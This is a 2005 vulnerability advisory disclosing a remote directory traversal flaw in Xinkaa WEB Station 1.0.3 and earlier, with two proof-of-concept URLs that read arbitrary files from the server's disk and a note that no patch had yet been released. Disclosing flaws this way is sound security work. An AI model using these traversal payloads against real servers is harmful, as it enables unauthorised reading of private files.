#######################################################################

                             Luigi Auriemma

Application:  Xinkaa WEB Station
              http://www.xinkaa.com
Versions:     <= 1.0.3
Platforms:    Windows
Bug:          directory traversal
Exploitation: remote
Date:         18 Feb 2005
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Xinkaa is a simple web server with a built-in minimal html editor.


#######################################################################

======
2) Bug
======


The program is affected by a classical directory traversal, so an
attacker is able to download any file from the disk where the webserver
is installed.


#######################################################################

===========
3) The Code
===========


  http://host/../../../file
  http://host/..\..\..\file


#######################################################################

======
4) Fix
======


No fix.
A patch should be released some days ago but nothing has been released
yet...


#######################################################################